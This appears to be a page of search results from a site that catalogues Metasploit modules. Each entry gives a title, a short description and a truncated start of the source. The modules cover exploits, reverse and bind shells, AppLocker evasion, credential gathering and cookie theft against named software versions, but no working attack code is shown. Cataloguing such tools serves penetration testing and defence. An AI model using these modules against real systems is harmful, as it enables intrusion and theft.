6846 matches found
BASE base_qry_common Remote File Include
This module exploits a remote file inclusion vulnerability in the baseqrycommon.php file in BASE 1.2.4 and earlier. This module requires Metasploit: https://metasploit.com/download Current source: https://github.com/rapid7/metasploit-framework class MetasploitModule 'BASE baseqrycommon Remote Fil...
Microsoft SQL Server Command Execution
This module will execute a Windows command on a MSSQL/MSDE instance via the xpcmdshell default or the spoacreate procedure more opsec safe, no output, no temporary data table. A valid username and password is required to use this module. This module requires Metasploit:...
Realtek Media Player Playlist Buffer Overflow
This module exploits a stack buffer overflow in Realtek Media PlayerRtlRack A4.06. When a Realtek Media Player client opens a specially crafted playlist, an attacker may be able to execute arbitrary code. This module requires Metasploit: https://metasploit.com/download Current source:...
Windows Command Shell, Bind TCP (via Ruby)
Continually listen for a connection and spawn a command shell via Ruby This module requires Metasploit: https://metasploit.com/download Current source: https://github.com/rapid7/metasploit-framework module MetasploitModule CachedSize = 128 include Msf::Payload::Single include...
EMC AlphaStor Library Manager Arbitrary Command Execution
EMC AlphaStor Library Manager is prone to a remote command-injection vulnerability because the application fails to properly sanitize user-supplied input. This module requires Metasploit: https://metasploit.com/download Current source: https://github.com/rapid7/metasploit-framework class...
DoubleTake/HP StorageWorks Storage Mirroring Service Authentication Overflow
This module exploits a stack buffer overflow in the authentication mechanism of NSI Doubletake which is also rebranded as HP Storage Works. This vulnerability was found by Titon of Bastard Labs. This module requires Metasploit: https://metasploit.com/download Current source:...
Samba lsa_io_trans_names Heap Overflow
This module triggers a heap overflow in the LSA RPC service of the Samba daemon. This module requires Metasploit: https://metasploit.com/download Current source: https://github.com/rapid7/metasploit-framework class MetasploitModule 'Samba lsaiotransnames Heap Overflow', 'Description' = %q This...
PHP Command Shell, Bind TCP (via Perl)
Listen for a connection and spawn a command shell via perl persistent This module requires Metasploit: https://metasploit.com/download Current source: https://github.com/rapid7/metasploit-framework module MetasploitModule CachedSize = :dynamic include Msf::Payload::Single include...
Oracle 9i XDB HTTP PASS Overflow (win32)
This module exploits a stack buffer overflow in the authorization code of the Oracle 9i HTTP XDB service. David Litchfield, has illustrated multiple vulnerabilities in the Oracle 9i XML Database XDB, during a seminar on "Variations in exploit methods between Linux and Windows" presented at the...
Cisco Configuration Importer
This module imports a Cisco IOS or NXOS device configuration. This module requires Metasploit: https://metasploit.com/download Current source: https://github.com/rapid7/metasploit-framework class MetasploitModule 'Cisco Configuration Importer', 'Description' = %q This module imports a Cisco IOS o...
Docker-Credential-Wincred.exe Privilege Escalation
This exploit leverages a vulnerability in docker desktop community editions prior to 2.1.0.1 where an attacker can write a payload to a lower-privileged area to be executed automatically by the docker user at login. This module requires Metasploit: https://metasploit.com/download Current source:...
Applocker Evasion - Microsoft Workflow Compiler
This module will assist you in evading Microsoft Windows Applocker and Software Restriction Policies. This technique utilises the Microsoft signed binaries Microsoft.Workflow.Compiler.exe to execute user supplied code. This module requires Metasploit: https://metasploit.com/download Current sourc...
Applocker Evasion - Windows Presentation Foundation Host
This module will assist you in evading Microsoft Windows Applocker and Software Restriction Policies. This technique utilises the Microsoft signed binary PresentationHost.exe to execute user supplied code. This module requires Metasploit: https://metasploit.com/download Current source:...
Ruby Pingback, Bind TCP
Listens for a connection from the attacker, sends a UUID, then terminates module MetasploitModule CachedSize = 103 include Msf::Payload::Single include Msf::Payload::Ruby include Msf::Payload::Pingback include Msf::Payload::Pingback::Options def initializeinfo = supermergeinfoinfo, 'Name' = 'Ruby...
Cisco Prime Infrastructure Health Monitor TarArchive Directory Traversal Vulnerability
This module exploits a vulnerability found in Cisco Prime Infrastructure. The issue is that the TarArchive Java class the HA Health Monitor component uses does not check for any directory traversals while unpacking a Tar file, which can be abused by a remote user to leverage the UploadServlet cla...
Unix Command Shell, Reverse UDP (/dev/udp)
Creates an interactive shell via bash's builtin /dev/udp. This will not work on circa 2009 and older Debian-based Linux distributions including Ubuntu because they compile bash without the /dev/udp feature. This module requires Metasploit: https://metasploit.com/download Current source:...
CAN Flood
This module floods a CAN interface with supplied frames. This module requires Metasploit: https://metasploit.com/download Current source: https://github.com/rapid7/metasploit-framework class MetasploitModule 'CAN Flood', 'Description' = 'This module floods a CAN interface with supplied frames.',...
Exchange email enumeration
Error-based user enumeration for Office 365 integrated email addresses //usr/bin/env go run "$0" "$@"; exit "$?" package main import "crypto/tls" "fmt" "metasploit/module" "msmail" "net/http" "strconv" "strings" "sync" func main metadata := &module.Metadata Name: "Exchange email enumeration",...
On premise user enumeration
On premise enumeration of valid exchange users //usr/bin/env go run "$0" "$@"; exit "$?" package main import "crypto/tls" "metasploit/module" "msmail" "net/http" "sort" "strconv" "sync" "time" func main metadata := &module.Metadata Name: "On premise user enumeration", Description: "On premise...
Peinjector
This module will inject a specified windows payload into a target executable. require 'rex' class MetasploitModule 'Peinjector', 'Description' = %q This module will inject a specified windows payload into a target executable. , 'License' = MSFLICENSE, 'Author' = 'Maximiliano Tedesco ', 'Platform'...
Cisco ASA Directory Traversal
This module exploits a directory traversal vulnerability in Cisco's Adaptive Security Appliance ASA software and Firepower Threat Defense FTD software. It lists the contents of Cisco's VPN web service which includes directories, files, and currently logged in users. This module requires Metasploi...
Pseudo-Shell Post-Exploitation Module
This module will run a Pseudo-Shell. This module requires Metasploit: https://metasploit.com/download Current source: https://github.com/rapid7/metasploit-framework require 'readline' class MetasploitModule Msf::Post include Msf::Post::File include Msf::Post::Unix include Msf::Post::Linux::System...
Multi Manage the screensaver of the target computer
This module allows you to turn on or off the screensaver of the target computer and also lock the current session. This module requires Metasploit: https://metasploit.com/download Current source: https://github.com/rapid7/metasploit-framework class MetasploitModule 'Multi Manage the screensaver o...
GitStack Unsanitized Argument RCE
This module exploits a remote code execution vulnerability that exists in GitStack through v2.3.10, caused by an unsanitized argument being passed to an exec function call. This module has been tested on GitStack v2.3.10. This module requires Metasploit: https://metasploit.com/download Current...
Scanner for Bleichenbacher Oracle in RSA PKCS #1 v1.5
Some TLS implementations handle errors processing RSA key exchanges and encryption PKCS 1 v1.5 messages in a broken way that leads an adaptive chosen-chiphertext attack. Attackers cannot recover a server's private key, but they can decrypt and sign messages with it. A strong oracle occurs when th...
Ayukov NFTP FTP Client Buffer Overflow
This module exploits a stack-based buffer overflow vulnerability against Ayukov NFTPD FTP Client 2.0 and earlier. By responding with a long string of data for the SYST request, it is possible to cause a denail-of-service condition on the FTP client, or arbitrary remote code exeuction under the...
Advantech WebAccess Webvrpcs Service Opcode 80061 Stack Buffer Overflow
This module exploits a stack buffer overflow in Advantech WebAccess 8.2. By sending a specially crafted DCERPC request, an attacker could overflow the buffer and execute arbitrary code. This module requires Metasploit: https://metasploit.com/download Current source:...
Linux Meterpreter, Reverse TCP Inline
Run the Meterpreter / Mettle server payload stageless This module requires Metasploit: https://metasploit.com/download Current source: https://github.com/rapid7/metasploit-framework Module generated by tools/modules/generatemettlepayloads.rb module MetasploitModule CachedSize = 1137332 include...
Linux Meterpreter, Reverse HTTPS Inline
Run the Meterpreter / Mettle server payload stageless This module requires Metasploit: https://metasploit.com/download Current source: https://github.com/rapid7/metasploit-framework Module generated by tools/modules/generatemettlepayloads.rb module MetasploitModule CachedSize = 1271304 include...
Scan CAN Bus for Diagnostic Modules
Post Module to scan the CAN bus for any modules that can respond to UDS DSC queries This module requires Metasploit: https://metasploit.com/download Current source: https://github.com/rapid7/metasploit-framework class MetasploitModule 'Scan CAN Bus for Diagnostic Modules', 'Description' = %q Post...
Varnish Cache CLI Login Utility
This module attempts to login to the Varnish Cache varnishd CLI instance using a bruteforce list of passwords. This module requires Metasploit: https://metasploit.com/download Current source: https://github.com/rapid7/metasploit-framework require 'metasploit/framework/credentialcollection' requir...
Android Meterpreter Shell, Reverse TCP Inline
Connect back to the attacker and spawn a Meterpreter shell This module requires Metasploit: https://metasploit.com/download Current source: https://github.com/rapid7/metasploit-framework module MetasploitModule CachedSize = :dynamic include Msf::Payload::TransportConfig include Msf::Payload::Sing...
OpenNMS Java Object Unserialization Remote Code Execution
This module exploits a vulnerability in the OpenNMS Java object which allows an unauthenticated attacker to run arbitrary code against the system. This module requires Metasploit: https://metasploit.com/download Current source: https://github.com/rapid7/metasploit-framework class MetasploitModule...
Regsvr32.exe (.sct) Command Delivery Server
This module uses the Regsvr32.exe Application Whitelisting Bypass technique as a way to run a command on a target system. The major advantage of this technique is that you can execute a static command on the target system and dynamically and remotely change the command that will actually run by...
Android ADB Debug Server Remote Payload Execution
Writes and spawns a native payload on an android device that is listening for adb debug messages. This module requires Metasploit: https://metasploit.com/download Current source: https://github.com/rapid7/metasploit-framework class MetasploitModule 'Android ADB Debug Server Remote Payload...
BusyBox Enumerate Connections
This module will be applied on a session connected to a BusyBox shell. It will enumerate the connections established with the router or device executing BusyBox. This module requires Metasploit: https://metasploit.com/download Current source: https://github.com/rapid7/metasploit-framework class...
VMWare Update Manager 4 Directory Traversal
This modules exploits a directory traversal vulnerability in VMWare Update Manager on port 9084. Versions affected by this vulnerability: vCenter Update Manager 4.1 prior to Update 2, vCenter Update Manager 4 Update 4. This module requires Metasploit: https://metasploit.com/download Current sourc...
BSD x64 Command Shell, Reverse TCP Inline (IPv6)
Connect back to attacker and spawn a command shell over IPv6 This module requires Metasploit: https://metasploit.com/download Current source: https://github.com/rapid7/metasploit-framework module MetasploitModule CachedSize = 105 include Msf::Payload::Single include Msf::Payload::Bsd include...
Windows Gather Active Directory BitLocker Recovery
This module will enumerate BitLocker recovery passwords in the default AD directory. This module does require Domain Admin or other delegated privileges. This module requires Metasploit: https://metasploit.com/download Current source: https://github.com/rapid7/metasploit-framework class...
Belkin Play N750 login.cgi Buffer Overflow
This module exploits a remote buffer overflow vulnerability on Belkin Play N750 DB Wireless Dual-Band N+ Router N750 routers. The vulnerability exists in the handling of HTTP queries with long 'jump' parameters addressed to the /login.cgi URL, allowing remote unauthenticated attackers to execute...
PXE Boot Exploit Server
This module provides a PXE server, running a DHCP and TFTP server. The default configuration loads a linux kernel and initrd into memory that reads the hard drive; placing a payload to install metsvc, disable the firewall, and add a new user metasploit on any Windows partition seen, and add a uid...
MS15-018 Microsoft Internet Explorer 10 and 11 Cross-Domain JavaScript Injection
This module exploits a universal cross-site scripting UXSS vulnerability found in Internet Explorer 10 and 11. By default, you will steal the cookie from TARGETURI which cannot have X-Frame-Options or it will fail. You can also have your own custom JavaScript by setting the CUSTOMJS option. Lastl...
WordPress Pixabay Images PHP Code Upload
This module exploits multiple vulnerabilities in the WordPress plugin Pixabay Images 2.3.6. The plugin does not check the host of a provided download URL which can be used to store and execute malicious PHP code on the system. This module requires Metasploit: https://metasploit.com/download Curre...
Reflective DLL Injection, Hidden Bind TCP Stager
Inject a DLL via a reflective loader. Listen for a connection from a hidden port and spawn a command shell to the allowed host. This module requires Metasploit: https://metasploit.com/download Current source: https://github.com/rapid7/metasploit-framework module MetasploitModule CachedSize = 343...
VNC Server (Reflective Injection), Hidden Bind TCP Stager
Inject a VNC Dll via a reflective loader staged. Listen for a connection from a hidden port and spawn a command shell to the allowed host. This module requires Metasploit: https://metasploit.com/download Current source: https://github.com/rapid7/metasploit-framework module MetasploitModule...
Tincd Post-Authentication Remote TCP Stack Buffer Overflow
This module exploits a stack buffer overflow in Tinc's tincd service. After authentication, a specially crafted tcp packet default port 655 leads to a buffer overflow and allows to execute arbitrary code. This module has been tested with tinc-1.1pre6 on Windows XP custom calc payload and Windows ...
GNU Wget FTP Symlink Arbitrary Filesystem Access
This module exploits a vulnerability in Wget when used in recursive -r mode with a FTP server as a destination. A symlink is used to allow arbitrary writes to the target's filesystem. To specify content for the file, use the "file:/path" syntax for the TARGETDATA option. Tested successfully with...
HP Network Node Manager I PMD Buffer Overflow
This module exploits a stack buffer overflow in HP Network Node Manager I NNMi. The vulnerability exists in the pmd service, due to the insecure usage of functions like strcpy and strcat while handling stackoption packets with user controlled data. In order to bypass ASLR this module uses a...
Advantech WebAccess DBVisitor.dll ChartThemeConfig SQL Injection
This module exploits a SQL injection vulnerability found in Advantech WebAccess 7.1. The vulnerability exists in the DBVisitor.dll component, and can be abused through malicious requests to the ChartThemeConfig web service. This module can be used to extract the site and project usernames and...
Adobe Flash Player Regular Expression Heap Overflow
This module exploits a vulnerability found in the ActiveX component of Adobe Flash Player before 11.5.502.149. By supplying a specially crafted swf file with special regex value, it is possible to trigger a memory corruption, which results in remote code execution under the context of the user, a...